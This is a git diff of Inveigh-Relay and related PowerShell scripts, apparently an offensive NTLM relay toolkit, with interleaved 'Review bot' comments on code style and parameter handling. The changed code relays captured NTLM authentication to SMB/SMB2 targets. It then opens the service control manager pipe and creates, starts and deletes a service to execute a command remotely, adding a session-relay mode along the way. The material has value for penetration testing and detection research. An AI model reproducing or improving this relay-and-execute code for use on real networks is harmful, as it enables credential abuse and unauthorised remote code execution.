-rw-r--r--Inveigh-Relay.ps1401
-rw-r--r--Inveigh.ps1353
-rw-r--r--Invoke-SMBClient.ps190
-rw-r--r--Invoke-SMBExec.ps1116
4 files changed, 495 insertions, 465 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1
index 49c5629..dfd9500 100644
--- a/Inveigh-Relay.ps1
+++ b/Inveigh-Relay.ps1
@@ -238,6 +238,11 @@ if($Attack -eq 'Execute' -and !$Command)
Write-Output "[-] -Command requiried with -Attack Execute"
throw
}
+elseif($Attack -eq 'Session' -and $SMB1)
+{
+ Write-Output "[-] -SMB1 not suppported with -Attack Session"
+ throw
+}
if(!$FileOutputDirectory)
{
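Review bot: The new error string in the added `elseif` branch misspells "supported" as "suppported"; it should read `Write-Output "[-] -SMB1 not supported with -Attack Session"`. The pre-existing message two lines above has the same kind of typo ("requiried"), so both could be corrected in the same pass since this hunk already touches the block.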
@@ -396,6 +401,11 @@ else
$inveigh.newline = ""
}
+if($inveigh.running)
+{
+ $inveigh.output_pause = $true
+}
+
# Write startup messages
$inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null
@@ -410,7 +420,7 @@ if($HTTP -eq 'Y')
if($HTTP_port_check)
{
$HTTP = "N"
- $inveigh.output_queue.Add("[+] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
+ $inveigh.output_queue.Add("[-] HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
}
else
{
@@ -727,7 +737,7 @@ elseif($RunTime -gt 1)
if($ShowHelp -eq 'Y')
{
- $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop Inveigh-Relay") > $null
+ $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop manually") > $null
if($inveigh.console_output)
{
@@ -796,10 +806,10 @@ while($inveigh.output_queue.Count -gt 0)
}
-$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
-$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
-$process_ID = $process_ID -replace "-00-00",""
-[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+if($inveigh.running)
+{
+ $inveigh.output_pause = $false
+}
# Begin ScriptBlocks
@@ -812,6 +822,7 @@ $shared_basic_functions_scriptblock =
param ([Int]$length_start,[Byte[]]$string_extract_data)
$string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+
return $string_length
}
@@ -820,6 +831,7 @@ $shared_basic_functions_scriptblock =
param ([Int]$length_start,[Byte[]]$string_extract_data)
$string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
+
return $string_length
}
@@ -831,6 +843,7 @@ $shared_basic_functions_scriptblock =
$string_data = $string_data -replace "-00",""
$string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+
return $string_extract
}
@@ -851,6 +864,16 @@ $packet_functions_scriptblock =
return $byte_array
}
+ function Get-ProcessIDArray
+ {
+ $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+ $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+ [Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ return $process_ID_bytes
+ }
+
+
#NetBIOS
function New-PacketNetBIOSSessionService
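Review bot: Get-ProcessIDArray turns the PID into a hex string with `ToString`, splits it, parses each pair with `ToInt16` and casts through `[Char]` only to rebuild the same four little-endian bytes that `GetBytes` already returned, so the body reduces to `[Byte[]]$process_ID_bytes = [System.BitConverter]::GetBytes([System.Diagnostics.Process]::GetCurrentProcess().Id)`. The function also has no comment stating that it returns all four bytes and that the SMB1 path depends on New-PacketSMBHeader slicing the first two (`$packet_process_ID = $packet_process_ID[0,1]` in the next hunk); a line such as `# Returns the 4-byte little-endian PID used in the SMB2 header; New-PacketSMBHeader keeps only the low 2 bytes for SMB1` above the function would make that contract explicit.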
@@ -873,6 +896,8 @@ $packet_functions_scriptblock =
{
param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+ $packet_process_ID = $packet_process_ID[0,1]
+
$packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
$packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
$packet_SMBHeader.Add("Command",$packet_command)
@@ -1087,7 +1112,7 @@ $packet_functions_scriptblock =
function New-PacketSMB2Header
{
- param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
[Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
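Review bot: `$packet_process_ID` is inserted in the middle of New-PacketSMB2Header's positional parameter list, so any call site still passing five positional arguments binds its tree ID as the process ID and its session ID as the tree ID without any error. Every caller visible in this diff was updated, but the commit also touches Inveigh.ps1, Invoke-SMBClient.ps1 and Invoke-SMBExec.ps1, so it is worth confirming that no five-argument call remains there. Declaring the parameter last with the previous all-zero default, `[Byte[]]$packet_process_ID = (0x00,0x00,0x00,0x00)`, would let a missed caller keep the old behaviour instead of silently shifting arguments.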
@@ -1102,7 +1127,7 @@ $packet_functions_scriptblock =
$packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
$packet_SMB2Header.Add("MessageID",$packet_message_ID)
- $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("ProcessID",$packet_process_ID)
$packet_SMB2Header.Add("TreeID",$packet_tree_ID)
$packet_SMB2Header.Add("SessionID",$packet_session_ID)
$packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
@@ -1110,6 +1135,15 @@ $packet_functions_scriptblock =
return $packet_SMB2Header
}
+ function New-PacketSMB2Echo
+ {
+ $packet_SMB2EchoRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2EchoRequest.Add("StructureSize",[Byte[]](0x04,0x00))
+ $packet_SMB2EchoRequest.Add("Reserved",[Byte[]](0x00,0x00))
+
+ return $packet_SMB2EchoRequest
+ }
+
function New-PacketSMB2NegotiateProtocolRequest
{
$packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
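Review bot: New-PacketSMB2Echo is added without a comment and no caller for it appears anywhere in this diff, so a reader cannot tell whether it is used by code outside this view or is currently dead. A one-line header such as `# SMB2 ECHO request body (StructureSize 4, Reserved 2)` would document the structure it builds; if nothing calls it yet, note that in the commit message or hold the function until its use lands.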
@@ -1596,7 +1630,7 @@ $SMB_relay_functions_scriptblock =
function SMBRelayChallenge
{
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$signing_check)
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_process_ID)
if($SMB_relay_socket)
{
@@ -1614,7 +1648,7 @@ $SMB_relay_functions_scriptblock =
'NegotiateSMB'
{
- $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $SMB_process_ID 0x00,0x00
$packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -1627,8 +1661,20 @@ $SMB_relay_functions_scriptblock =
if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
{
- $SMB_version = 'SMB1'
- $SMB_client_stage = 'NTLMSSPNegotiate'
+
+ if($Attack -eq 'Session')
+ {
+ $inveigh.target_list.Remove($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString)
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed target $($SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString) due to SMB1 requirement")
+ $SMB_relay_socket.Close()
+ $SMB_client_stage = 'exit'
+ }
+ else
+ {
+ $SMB_version = 'SMB1'
+ $SMB_client_stage = 'NTLMSSPNegotiate'
+ }
+
}
else
{
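Review bot: The new Session branch calls `$inveigh.output_queue.Add(...)` without the `> $null` that this same commit appends to every other `.Add` call in the file, so the index returned by ArrayList.Add leaks into SMBRelayChallenge's pipeline output. Apply the same suppression here, and check `$inveigh.target_list.Remove(...)` as well: it is silent if target_list is an ArrayList (Remove returns void) but leaks a bool if it is a generic List. The long `$SMB_relay_socket.Client.RemoteEndpoint.Address.IPaddressToString` expression is evaluated twice; hoisting it into a local such as `$SMB_target_IP` before the `Remove` call shortens both lines. SMBRelayChallenge's body continues outside this hunk.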
@@ -1656,7 +1702,7 @@ $SMB_relay_functions_scriptblock =
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
$SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
$SMB2_message_ID = 1
- $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -1674,7 +1720,7 @@ $SMB_relay_functions_scriptblock =
if($SMB_version -eq 'SMB1')
{
- $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $SMB_process_ID 0x00,0x00
$packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
@@ -1686,8 +1732,8 @@ $SMB_relay_functions_scriptblock =
}
else
{
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
@@ -1713,7 +1759,7 @@ $SMB_relay_functions_scriptblock =
function SMBRelayResponse
{
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID)
+ param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID,$SMB_process_ID)
$SMB_client_receive = New-Object System.Byte[] 1024
@@ -1724,7 +1770,7 @@ $SMB_relay_functions_scriptblock =
if($SMB_version -eq 'SMB1')
{
- $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $SMB_process_ID $SMB_user_ID
$packet_SMB_header["UserID"] = $SMB_user_ID
$packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
@@ -1739,7 +1785,7 @@ $SMB_relay_functions_scriptblock =
{
$SMB2_message_ID = 3
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
- $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $HTTP_request_bytes
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
@@ -1764,10 +1810,10 @@ $SMB_relay_functions_scriptblock =
if($HTTP_NTLM_domain_string -ne '')
{
- $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
}
- $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null
$SMB_relay_failed = $true
$SMB_relay_socket.Close()
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type to SMB relay authentication failed for $HTTP_username_full on $Target") > $null
@@ -1778,7 +1824,7 @@ $SMB_relay_functions_scriptblock =
function SMBRelayExecute
{
- param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID)
+ param ($SMB_relay_socket,$SMB_version,$SMB_user_ID,$SMB_session_ID,$SMB_process_ID)
$SMB_client_receive = New-Object System.Byte[] 1024
@@ -1852,7 +1898,7 @@ $SMB_relay_functions_scriptblock =
'TreeConnectAndXRequest'
{
- $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -1869,7 +1915,7 @@ $SMB_relay_functions_scriptblock =
{
$SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
$SMB_tree_ID = $SMB_client_receive[28,29]
- $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -1885,7 +1931,7 @@ $SMB_relay_functions_scriptblock =
'RPCBind'
{
$SMB_FID = $SMB_client_receive[42,43]
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
@@ -1905,7 +1951,7 @@ $SMB_relay_functions_scriptblock =
'ReadAndXRequest'
{
Start-Sleep -m 150
- $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBReadAndXRequest
$packet_SMB_data["FID"] = $SMB_FID
@@ -1921,7 +1967,7 @@ $SMB_relay_functions_scriptblock =
'OpenSCManagerW'
{
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
@@ -1967,12 +2013,12 @@ $SMB_relay_functions_scriptblock =
if($HTTP_NTLM_domain_string -ne '')
{
- $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target")
+ $inveigh.relay_user_failed_list.Add("$HTTP_source_IP $HTTP_username_full $Target") > $null
}
if(!$inveigh.relay_list.Contains("$HTTP_source_IP $Target"))
{
- $inveigh.relay_list.Add("$HTTP_source_IP $Target")
+ $inveigh.relay_list.Add("$HTTP_source_IP $Target") > $null
}
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_username_full does not have execution privilege on $Target") > $null
@@ -1986,7 +2032,7 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW'
{
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
@@ -2008,7 +2054,7 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW_First'
{
$SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
$packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
$packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
@@ -2040,7 +2086,7 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW_Middle'
{
$SMB_split_stage++
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
$SMB_split_index_tracker += $SMB_split_index
$packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
@@ -2070,7 +2116,7 @@ $SMB_relay_functions_scriptblock =
'CreateServiceW_Last'
{
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
$packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
@@ -2096,7 +2142,7 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service created on $Target") > $null
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Trying to execute SMB relay command on $Target") > $null
$SMB_service_context_handle = $SMB_client_receive[92..111]
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
@@ -2138,7 +2184,7 @@ $SMB_relay_functions_scriptblock =
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] SMB relay service $SMB_service failed to start on $Target") > $null
}
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
@@ -2173,7 +2219,7 @@ $SMB_relay_functions_scriptblock =
$packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
}
- $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
@@ -2191,7 +2237,7 @@ $SMB_relay_functions_scriptblock =
'CloseRequest'
{
- $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBCloseRequest 0x00,0x40
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -2206,7 +2252,7 @@ $SMB_relay_functions_scriptblock =
'TreeDisconnect'
{
- $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBTreeDisconnectRequest
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -2221,7 +2267,7 @@ $SMB_relay_functions_scriptblock =
'Logoff'
{
- $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $SMB_process_ID $SMB_user_ID
$SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
$packet_SMB_data = New-PacketSMBLogoffAndXRequest
$SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
@@ -2260,7 +2306,7 @@ $SMB_relay_functions_scriptblock =
{
$SMB2_message_ID = 4
$SMB2_tree_ID = 0x00,0x00,0x00,0x00
- $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
@@ -2277,8 +2323,8 @@ $SMB_relay_functions_scriptblock =
{
$SMB2_tree_ID = 0x01,0x00,0x00,0x00
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
$packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
@@ -2296,8 +2342,8 @@ $SMB_relay_functions_scriptblock =
{
$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
$SMB_file_ID = $SMB_client_receive[132..147]
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
$RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
$packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
@@ -2316,12 +2362,11 @@ $SMB_relay_functions_scriptblock =
'ReadRequest'
{
-
Start-Sleep -m 150
- $SMB2_message_ID += 1
- $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["CreditCharge"] = 0x10,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
$packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
@@ -2355,8 +2400,8 @@ $SMB_relay_functions_scriptblock =
'OpenSCManagerW'
{
- $SMB2_message_ID = 30
- $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB_process_ID $SMB2_tree_ID $SMB_session_ID
$packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
$SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
$packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
@@ -2383,13 +2428,12 @@ $SMB_relay_functions_scriptblock =
